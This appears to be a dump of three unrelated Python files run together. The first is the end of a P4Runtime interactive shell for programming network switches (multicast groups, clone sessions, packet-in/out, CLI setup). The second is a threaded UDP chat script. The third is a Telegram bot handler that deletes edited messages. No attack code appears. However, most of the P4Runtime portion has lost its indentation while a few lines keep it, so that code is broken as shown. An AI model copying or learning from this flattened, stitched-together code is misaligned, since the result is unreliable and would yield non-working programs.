p4runtime_pb2.PacketReplicationEngineEntry)
self.group_id = group_id
self.replicas = []
self.__doc__ = """
Multicast group entry.
Create an instance with multicast_group_entry(<group_id>).
Add replicas with <self>.add(<eg_port_1>, <instance_1>).add(<eg_port_2>, <instance_2>)...
"""
self._init = True
def __dir__(self):
return ["group_id", "replicas"]
def __setattr__(self, name, value):
if name[0] == "_":
super().__setattr__(name, value)
return
elif name == "group_id":
if type(value) is not int:
raise UserError("group_id must be an integer")
elif name == "replicas":
if type(value) is not list:
raise UserError("replicas must be a list of Replica objects")
for r in value:
if type(r) is not Replica:
raise UserError("replicas must be a list of Replica objects")
super().__setattr__(name, value)
def _from_msg(self, msg):
self.group_id = msg.multicast_group_entry.multicast_group_id
for r in msg.multicast_group_entry.replicas:
self.add(r.egress_port, r.instance)
def read(self, function=None):
"""Generate a P4Runtime Read RPC to read a single MulticastGroupEntry
(wildcard reads not supported).
If function is None, return a MulticastGroupEntry instance (or None if
the provided group id does not exist). If function is not None, function
is applied to the MulticastGroupEntry instance (if any).
"""
if function is None:
            return next(super().read(), None)
else:
super().read(function)
def _update_msg(self):
entry = p4runtime_pb2.PacketReplicationEngineEntry()
mcg_entry = entry.multicast_group_entry
mcg_entry.multicast_group_id = self.group_id
for replica in self.replicas:
r = mcg_entry.replicas.add()
r.CopyFrom(replica._msg)
self._entry = entry
def _validate_msg(self):
if self.group_id == 0:
raise UserError("0 is not a valid group_id for MulticastGroupEntry")
def add(self, egress_port=None, instance=0):
"""Add a replica to the multicast group."""
self.replicas.append(Replica(egress_port, instance))
return self
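# Illustrative sketch (not part of the original file): building a multicast group
# as described in the __init__ docstring above. The group id and ports are
# hypothetical, and insert()/modify()/delete() are assumed to be provided by
# _EntityBase elsewhere in this module:
#   mcg = MulticastGroupEntry(group_id=1).add(1).add(2, instance=1)
#   mcg.insert()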
class CloneSessionEntry(_EntityBase):
def __init__(self, session_id=0):
super().__init__(
P4RuntimeEntity.packet_replication_engine_entry,
p4runtime_pb2.PacketReplicationEngineEntry)
self.session_id = session_id
self.replicas = []
self.cos = 0
self.packet_length_bytes = 0
self.__doc__ = """
Clone session entry.
Create an instance with clone_session_entry(<session_id>).
Add replicas with <self>.add(<eg_port_1>, <instance_1>).add(<eg_port_2>, <instance_2>)...
Access class of service with <self>.cos.
Access truncation length with <self>.packet_length_bytes.
"""
self._init = True
def __dir__(self):
return ["session_id", "replicas", "cos", "packet_length_bytes"]
def __setattr__(self, name, value):
if name[0] == "_":
super().__setattr__(name, value)
return
elif name == "session_id":
if type(value) is not int:
raise UserError("session_id must be an integer")
elif name == "replicas":
if type(value) is not list:
raise UserError("replicas must be a list of Replica objects")
for r in value:
if type(r) is not Replica:
raise UserError("replicas must be a list of Replica objects")
elif name == "cos":
if type(value) is not int:
raise UserError("cos must be an integer")
elif name == "packet_length_bytes":
if type(value) is not int:
raise UserError("packet_length_bytes must be an integer")
super().__setattr__(name, value)
def _from_msg(self, msg):
self.session_id = msg.clone_session_entry.session_id
for r in msg.clone_session_entry.replicas:
self.add(r.egress_port, r.instance)
self.cos = msg.clone_session_entry.class_of_service
self.packet_length_bytes = msg.clone_session_entry.packet_length_bytes
def read(self, function=None):
"""Generate a P4Runtime Read RPC to read a single CloneSessionEntry
(wildcard reads not supported).
If function is None, return a CloneSessionEntry instance (or None if
        the provided session id does not exist). If function is not None, function
is applied to the CloneSessionEntry instance (if any).
"""
if function is None:
            return next(super().read(), None)
else:
super().read(function)
def _update_msg(self):
entry = p4runtime_pb2.PacketReplicationEngineEntry()
cs_entry = entry.clone_session_entry
cs_entry.session_id = self.session_id
for replica in self.replicas:
r = cs_entry.replicas.add()
r.CopyFrom(replica._msg)
cs_entry.class_of_service = self.cos
cs_entry.packet_length_bytes = self.packet_length_bytes
self._entry = entry
def add(self, egress_port=None, instance=0):
"""Add a replica to the clone session."""
self.replicas.append(Replica(egress_port, instance))
return self
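# Illustrative sketch (not part of the original file): a clone session with
# truncation, following the __init__ docstring above. The session id, port, and
# lengths are hypothetical, and insert() is assumed to come from _EntityBase:
#   cs = CloneSessionEntry(session_id=10).add(3)
#   cs.cos = 0
#   cs.packet_length_bytes = 128
#   cs.insert()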
class PacketMetadata:
def __init__(self, metadata_info_list):
self._md_info = OrderedDict()
self._md = OrderedDict()
# Initialize every metadata to zero value
for md in metadata_info_list:
self._md_info[md.name] = md
self._md[md.name] = self._parse_md('0', md)
self._set_docstring()
def _set_docstring(self):
self.__doc__ = "Available metadata:\n\n"
for name, info in self._md_info.items():
self.__doc__ += str(info)
self.__doc__ += """
Set a metadata value with <self>['<metadata_name>'] = '...'
You may also use <self>.set(<md_name>='<value>')
"""
def __dir__(self):
return ["clear"]
def _get_md_info(self, name):
if name in self._md_info:
return self._md_info[name]
raise UserError("'{}' is not a valid metadata name".format(name))
def __getitem__(self, name):
_ = self._get_md_info(name)
print(self._md.get(name, "Unset"))
def _parse_md(self, value, md_info):
if type(value) is not str:
raise UserError("Metadata value must be a string")
md = p4runtime_pb2.PacketMetadata()
md.metadata_id = md_info.id
md.value = bytes_utils.parse_value(value.strip(), md_info.bitwidth)
return md
def __setitem__(self, name, value):
md_info = self._get_md_info(name)
self._md[name] = self._parse_md(value, md_info)
def _ipython_key_completions_(self):
return self._md_info.keys()
def set(self, **kwargs):
for name, value in kwargs.items():
self[name] = value
def clear(self):
self._md.clear()
def values(self):
return self._md.values()
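# Illustrative sketch (not part of the original file): metadata values are given
# as strings and parsed against the bitwidth from P4Info. The variable name and
# the "egress_port" metadata field are hypothetical and depend on the P4 program:
#   pkt_out.metadata["egress_port"] = "1"
#   pkt_out.metadata.set(egress_port="1")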
class PacketIn:
def __init__(self):
ctrl_pkt_md = P4Objects(P4Type.controller_packet_metadata)
self.md_info_list = {}
if "packet_in" in ctrl_pkt_md:
self.p4_info = ctrl_pkt_md["packet_in"]
for md_info in self.p4_info.metadata:
self.md_info_list[md_info.name] = md_info
self.packet_in_queue = queue.Queue()
def _packet_in_recv_func(packet_in_queue):
while True:
msg = client.get_stream_packet("packet", timeout=None)
if not msg:
break
packet_in_queue.put(msg)
self.recv_t = Thread(target=_packet_in_recv_func, args=(self.packet_in_queue, ))
self.recv_t.start()
def sniff(self, function=None, timeout=None):
"""
Return an iterator of packet-in messages.
If the function is provided, we do not return an iterator and instead we apply
the function to every packet-in message.
"""
msgs = []
while True:
try:
msgs.append(self.packet_in_queue.get(block=True, timeout=timeout))
except queue.Empty:
# No item available when timeout.
break
except KeyboardInterrupt:
# User sends an interrupt(e.g., Ctrl+C).
break
if function is None:
return iter(msgs)
else:
for msg in msgs:
function(msg)
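# Illustrative sketch (not part of the original file): two ways of consuming
# packet-in messages with sniff(), using the singleton "packet_in" object created
# in main() below; the timeout value is arbitrary:
#   for msg in packet_in.sniff(timeout=2):
#       print(msg)
#   packet_in.sniff(lambda msg: print(msg), timeout=2)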
class PacketOut:
def __init__(self, payload=b'', **kwargs):
self.p4_info = P4Objects(P4Type.controller_packet_metadata)["packet_out"]
self.payload = payload
self.metadata = PacketMetadata(self.p4_info.metadata)
if kwargs:
for key, value in kwargs.items():
self.metadata[key] = value
def _update_msg(self):
self._entry = p4runtime_pb2.PacketOut()
self._entry.payload = self.payload
self._entry.metadata.extend(self.metadata.values())
def __setattr__(self, name, value):
if name == "payload" and type(value) is not bytes:
raise UserError("payload must be a bytes type")
if name == "metadata" and type(value) is not PacketMetadata:
raise UserError("metadata must be a PacketMetadata type")
return super().__setattr__(name, value)
def __dir__(self):
return ["metadata", "send", "payload"]
def __str__(self):
self._update_msg()
return str(_repr_pretty_p4runtime(self._entry))
def _repr_pretty_(self, p, cycle):
self._update_msg()
p.text(_repr_pretty_p4runtime(self._entry))
def send(self):
self._update_msg()
msg = p4runtime_pb2.StreamMessageRequest()
msg.packet.CopyFrom(self._entry)
client.stream_out_q.put(msg)
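# Illustrative sketch (not part of the original file): crafting and sending a
# packet-out with the constructor and send() above. The payload and the
# "egress_port" metadata field are hypothetical:
#   p = PacketOut(b'\x00' * 64, egress_port="1")
#   p.send()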
def Write(input_):
"""
Reads a WriteRequest from a file (text format) and sends it to the server.
It rewrites the device id and election id appropriately.
"""
req = p4runtime_pb2.WriteRequest()
if os.path.isfile(input_):
with open(input_, 'r') as f:
google.protobuf.text_format.Merge(f.read(), req)
client.write(req)
else:
raise UserError(
"Write only works with files at the moment and '{}' is not a file".format(
input_))
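# Illustrative sketch (not part of the original file): Write() expects the path to
# a WriteRequest in protobuf text format; the filename is hypothetical:
#   Write("update.txt")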
def APIVersion():
"""
Returns the version of the P4Runtime API implemented by the server, using
the Capabilities RPC.
"""
return client.api_version()
# see https://ipython.readthedocs.io/en/stable/config/details.html
class MyPrompt(Prompts):
def in_prompt_tokens(self, cli=None):
return [(Token.Prompt, 'P4Runtime sh'),
                (Token.PromptSeparator, ' >>> ')]
FwdPipeConfig = namedtuple('FwdPipeConfig', ['p4info', 'bin'])
def get_arg_parser():
def election_id(arg):
try:
nums = tuple(int(x) for x in arg.split(','))
if len(nums) != 2:
                raise ValueError
return nums
except Exception:
            raise argparse.ArgumentTypeError(
                "Invalid election id, expected <Hi>,<Lo>")
def pipe_config(arg):
try:
paths = FwdPipeConfig(*[x for x in arg.split(',')])
if len(paths) != 2:
                raise ValueError
return paths
except Exception:
            raise argparse.ArgumentTypeError(
                "Invalid pipeline config, expected <p4info path>,<binary config path>")
parser = argparse.ArgumentParser(description='P4Runtime shell')
parser.add_argument('--device-id',
help='Device id',
type=int, action='store', default=1)
parser.add_argument('--grpc-addr',
help='P4Runtime gRPC server address',
metavar='<IP>:<port>',
type=str, action='store', default='localhost:9559')
parser.add_argument('-v', '--verbose', help='Increase output verbosity',
action='store_true')
parser.add_argument('--election-id',
help='Election id to use',
metavar='<Hi>,<Lo>',
type=election_id, action='store', default=(1, 0))
parser.add_argument('--config',
help='If you want the shell to push a pipeline config to the server first',
metavar='<p4info path (text)>,<binary config path>',
type=pipe_config, action='store', default=None)
return parser
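# Illustrative sketch (not part of the original file): typical invocations built
# from the parser above. The script name, gRPC address, and file paths are
# hypothetical:
#   python shell.py --grpc-addr localhost:9559 --device-id 1 --election-id 1,0
#   python shell.py --config p4info.txt,pipeline.bin -v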
def setup(device_id=1, grpc_addr='localhost:9559', election_id=(1, 0), config=None):
global client
logging.debug("Creating P4Runtime client")
client = P4RuntimeClient(device_id, grpc_addr, election_id)
if config is not None:
try:
p4info_path = config.p4info
bin_path = config.bin
except Exception:
raise ValueError("Argument 'config' must be a FwdPipeConfig namedtuple")
try:
client.set_fwd_pipe_config(p4info_path, bin_path)
except FileNotFoundError as e:
logging.critical(e)
client.tear_down()
sys.exit(1)
except P4RuntimeException as e:
logging.critical("Error when setting config")
logging.critical(e)
client.tear_down()
sys.exit(1)
except Exception:
logging.critical("Error when setting config")
client.tear_down()
sys.exit(1)
try:
p4info = client.get_p4info()
except P4RuntimeException as e:
logging.critical("Error when retrieving P4Info")
logging.critical(e)
client.tear_down()
sys.exit(1)
logging.debug("Parsing P4Info message")
context.set_p4info(p4info)
def teardown():
global client
logging.debug("Tearing down P4Runtime client")
client.tear_down()
client = None
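# Illustrative sketch (not part of the original file): using setup()/teardown()
# directly, e.g. from a script, instead of going through main(); the file paths
# are hypothetical:
#   setup(device_id=1, grpc_addr='localhost:9559', election_id=(1, 0),
#         config=FwdPipeConfig('p4info.txt', 'pipeline.bin'))
#   # ... use the entity classes above (TableEntry, MulticastGroupEntry, ...) ...
#   teardown()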
def main():
parser = get_arg_parser()
args = parser.parse_args()
if args.verbose:
logging.basicConfig(level=logging.DEBUG)
setup(args.device_id, args.grpc_addr, args.election_id, args.config)
c = Config()
c.TerminalInteractiveShell.banner1 = '*** Welcome to the IPython shell for P4Runtime ***'
c.TerminalInteractiveShell.prompts_class = MyPrompt
c.TerminalInteractiveShell.autocall = 2
c.TerminalInteractiveShell.show_rewritten_input = False
user_ns = {
"TableEntry": TableEntry,
"MatchKey": MatchKey,
"Action": Action,
"CounterEntry": CounterEntry,
"DirectCounterEntry": DirectCounterEntry,
"MeterEntry": MeterEntry,
"DirectMeterEntry": DirectMeterEntry,
"ActionProfileMember": ActionProfileMember,
"GroupMember": GroupMember,
"ActionProfileGroup": ActionProfileGroup,
"OneshotAction": OneshotAction,
"Oneshot": Oneshot,
"p4info": context.p4info,
"Write": Write,
"Replica": Replica,
"MulticastGroupEntry": MulticastGroupEntry,
"CloneSessionEntry": CloneSessionEntry,
"APIVersion": APIVersion,
"global_options": global_options,
}
for obj_type in P4Type:
user_ns[obj_type.p4info_name] = P4Objects(obj_type)
supported_entities = [
(P4RuntimeEntity.table_entry, P4Type.table, TableEntry),
(P4RuntimeEntity.counter_entry, P4Type.counter, CounterEntry),
(P4RuntimeEntity.direct_counter_entry, P4Type.direct_counter, DirectCounterEntry),
(P4RuntimeEntity.meter_entry, P4Type.meter, MeterEntry),
(P4RuntimeEntity.direct_meter_entry, P4Type.direct_meter, DirectMeterEntry),
(P4RuntimeEntity.action_profile_member, P4Type.action_profile, ActionProfileMember),
(P4RuntimeEntity.action_profile_group, P4Type.action_profile, ActionProfileGroup),
]
for entity, p4type, cls in supported_entities:
user_ns[entity.name] = P4RuntimeEntityBuilder(p4type, entity, cls)
user_ns["multicast_group_entry"] = MulticastGroupEntry
user_ns["clone_session_entry"] = CloneSessionEntry
user_ns["packet_in"] = PacketIn() # Singleton packet_in object to handle all packet-in cases
user_ns["packet_out"] = PacketOut
start_ipython(user_ns=user_ns, config=c, argv=[])
client.tear_down()
if __name__ == '__main__': # pragma: no cover
main()
|
MultiTaskchat.py
|
# -*- coding:utf-8 -*-
# Multi-task UDP chat program (part 1)
"""
Description:
    1. Write a program with two threads.
    2. Thread 1 receives data and displays it.
    3. Thread 2 reads keyboard input and sends it over UDP.
Requirement:
    - Summarize the characteristics of multi-task programs.
Improvements:
    1. Receive messages in a dedicated child thread so sending and receiving can happen at the same time.
    2. Receiving must work repeatedly, not just once.
    3. Make the child thread a daemon of the main thread (so the program can exit cleanly).
"""
# Spawn a child thread so messages can be received while sending.
import socket
import threading
def send_msg(udpsocket):
    """Send a message."""
    ipaddr = input("Enter the recipient's IP address: ")
    portnum = input("Enter the recipient's port number: ")
    content = input("Enter the message to send: ")
    udpsocket.sendto(content.encode(), (ipaddr, int(portnum)))
def recv_msg(udpsocket):
    """Receive messages continuously."""
    while True:
        recvdata, ip_port = udpsocket.recvfrom(1024)
        recvtxt = recvdata.decode()
        print("Received a message from {m}: {s}".format(m=str(ip_port), s=recvtxt))
def main():
    """Program entry point."""
    udpsocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    udpsocket.bind(("18.18.23.254", 2500))
    # Create a child thread dedicated to receiving messages.
    thread_recvmsg = threading.Thread(target=recv_msg, args=(udpsocket,))
    # Make the child thread a daemon of the main thread.
    thread_recvmsg.daemon = True
    # Start the child thread.
    thread_recvmsg.start()
    while True:
        print("\n" + "*"*20)
        print("*"*10 + "1. Send a message" + "*"*10)
        print("*"*10 + "2. Exit" + "*"*10)
        print("*"*20)
        # Read the user's choice:
        sel_num = int(input("Enter an option: "))
        # Dispatch on the user's choice.
        if sel_num == 1:
            print("You chose to send a message")
            send_msg(udpsocket)
        elif sel_num == 2:
            print("Exiting...")
            print("Exit complete.")
            break
    # Close the socket.
    udpsocket.close()
if __name__ == "__main__":
    # Start the chat program only when run as a script.
    main()
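# Illustrative sketch (not part of the original file): a quick way to exercise the
# receiver from another Python process; the address must match the bind() call in
# main() above:
#   import socket
#   s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
#   s.sendto("hello".encode(), ("18.18.23.254", 2500))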
|
edit.py
|
from utlis.rank import setrank ,isrank ,remrank ,setsudos ,remsudos ,setsudo
from handlers.delete import delete
from utlis.tg import Bot
from config import *
import threading, requests, time, random
def edit(client, message, redis):
    userID = message.from_user.id
    chatID = message.chat.id
    rank = isrank(redis, userID, chatID)
    group = redis.sismember("{}Nbot:groups".format(BOT_ID), chatID)
    redis.hincrby("{}Nbot:{}:edits".format(BOT_ID, chatID), userID)
    if not message.outgoing:
        locked_edits = redis.sismember("{}Nbot:Ledits".format(BOT_ID), chatID)
        is_admin = rank in ("sudo", "asudo", "sudos", "malk")
        if (rank is False or rank == 0) and group is True and locked_edits:
            Bot("deleteMessage", {"chat_id": chatID, "message_id": message.message_id})
        if not is_admin and group is True and locked_edits and not message.text:
            Bot("deleteMessage", {"chat_id": chatID, "message_id": message.message_id})
        if not is_admin and group is True and not locked_edits:
            t = threading.Thread(target=delete, args=(client, message, redis))
            t.daemon = True
            t.start()